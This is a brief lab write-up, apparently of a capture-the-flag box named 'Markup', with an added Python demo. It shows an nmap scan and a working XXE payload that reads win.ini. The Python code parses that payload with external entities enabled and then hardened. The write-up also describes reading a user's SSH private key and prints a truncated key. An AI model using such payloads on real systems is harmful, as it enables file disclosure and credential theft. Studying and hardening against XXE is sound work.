Markup
Personal Rating: Very Easy
Enumeration
A first nmap scan revealed a webserver on the Windows machine:
sudo nmap -sC -sV <IP>
XXE Exploit
Visiting that server showed that user input was sent to it in XML format. I tried a simple test XXE payload and it worked directly:
<?xml version = "1.0"?>
<!DOCTYPE soos [ <!ENTITY xee SYSTEM "C:/Windows/win.ini"> ]>
<order>
<quantity>1</quantity>
<item>&xee;</item>
<address></address>
</order>
The external entity had to be referenced in the "item" field, and the path delimiter had to be a forward slash ('/') even though the machine runs Windows.
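To show why this payload works and how a parser is hardened against it, here is an added example (not code from the writeup or the target) that feeds the same <order> document to Python's stdlib xml.sax parser with external entities enabled and disabled; the file read is a constructed temp file standing in for C:/Windows/win.ini, and the `build_payload`, `parse_item` and `demo` names are my own.

```python
# Added example (not from the writeup): the <order> payload above, parsed with the
# stdlib xml.sax parser in a vulnerable and a hardened configuration.
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import feature_external_ges, property_lexical_handler

def build_payload(path: str) -> bytes:
    # Same shape as the writeup's payload; only the SYSTEM path is a parameter.
    return (f'<?xml version="1.0"?>\n<!DOCTYPE soos [ <!ENTITY xee SYSTEM "{path}"> ]>\n'
            '<order><quantity>1</quantity><item>&xee;</item><address></address></order>').encode()

class ItemHandler(xml.sax.ContentHandler):
    """Collects the text of <item>, which is where the entity expands."""
    def __init__(self):
        super().__init__()
        self.in_item, self.item = False, ""
    def startElement(self, name, attrs):
        self.in_item = name == "item"
    def endElement(self, name):
        self.in_item = self.in_item and name != "item"
    def characters(self, content):
        if self.in_item:
            self.item += content

class RejectDoctype:
    """Lexical handler that refuses any DTD, so no entity can be declared at all."""
    def startDTD(self, name, public_id, system_id):
        raise ValueError("DOCTYPE not allowed")
    endDTD = comment = startCDATA = endCDATA = lambda self, *args: None

def parse_item(payload: bytes, external_entities: bool, reject_doctype: bool = False) -> str:
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, external_entities)  # True reproduces the XXE
    if reject_doctype:
        parser.setProperty(property_lexical_handler, RejectDoctype())
    handler = ItemHandler()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(payload))
    return handler.item

def demo() -> tuple:
    """Returns (item text with external entities on, item text with them off)."""
    with tempfile.NamedTemporaryFile("w", suffix=".ini", delete=False) as f:
        f.write("; constructed stand-in for win.ini\n[fonts]\n")  # constructed content
    try:
        payload = build_payload(f.name.replace(os.sep, "/"))  # forward slashes, as on the page
        return parse_item(payload, True), parse_item(payload, False)
    finally:
        os.unlink(f.name)
```

With external general entities enabled the file contents land in the "item" field exactly as the writeup describes; with them disabled the entity is silently skipped, and rejecting the DOCTYPE outright stops the entity from ever being declared.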
Persistence
Using the XXE I could read the user's private SSH key and SSH into the machine.
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
<SNIP>
m3MVFR4sN7a1cAAAANZGFuaWVsQEVudGl0eQECAwQFBg==
-----END OPENSSH PRIVATE KEY-----